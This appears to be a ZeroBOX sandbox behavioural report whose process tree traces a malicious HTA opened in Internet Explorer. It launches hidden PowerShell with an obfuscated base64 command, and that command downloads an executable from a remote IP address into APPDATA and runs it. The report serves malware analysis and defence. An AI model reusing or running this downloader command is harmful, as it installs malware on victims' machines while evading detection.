| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\niceskillbestexperiencegivenmegood.hta.html
3056
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3056 CREDAT:145409
  1784
  - cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershElL -Ex BypaSs -NOP -w 1 -c DevIcecREDEntIAldePlOymenT ; IeX($(Iex('[sySTeM.TEXt.EnCOdiNG]'+[cHAr]0X3A+[ChAR]0x3A+'UTF8.getsTriNG([sYSTeM.CoNVErT]'+[chAr]58+[cHAr]58+'froMBASE64STrING('+[chAr]34+'JFIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVyREVmaW5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcGJJZSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFZ0lNWEdITnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WGd5VHlHWXZTRyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPSSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm5lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVURxcHYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTUwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFydC1zbEVlcCgzKTtpTlZPS0UtaVRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcdmNjLmV4ZSI='+[cHAR]34+'))')))"
    1720
    - powershell.exe POWershElL -Ex BypaSs -NOP -w 1 -c DevIcecREDEntIAldePlOymenT ; IeX($(Iex('[sySTeM.TEXt.EnCOdiNG]'+[cHAr]0X3A+[ChAR]0x3A+'UTF8.getsTriNG([sYSTeM.CoNVErT]'+[chAr]58+[cHAr]58+'froMBASE64STrING('+[chAr]34+'JFIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVyREVmaW5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcGJJZSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFZ0lNWEdITnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WGd5VHlHWXZTRyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPSSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm5lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHVURxcHYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTUwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFydC1zbEVlcCgzKTtpTlZPS0UtaVRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcdmNjLmV4ZSI='+[cHAR]34+'))')))"
      1832
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hwjxn9pj.cmdline"
        2452
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES45DA.tmp" "c:\Users\test22\AppData\Local\Temp\CSC456B.tmp"
        2280

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents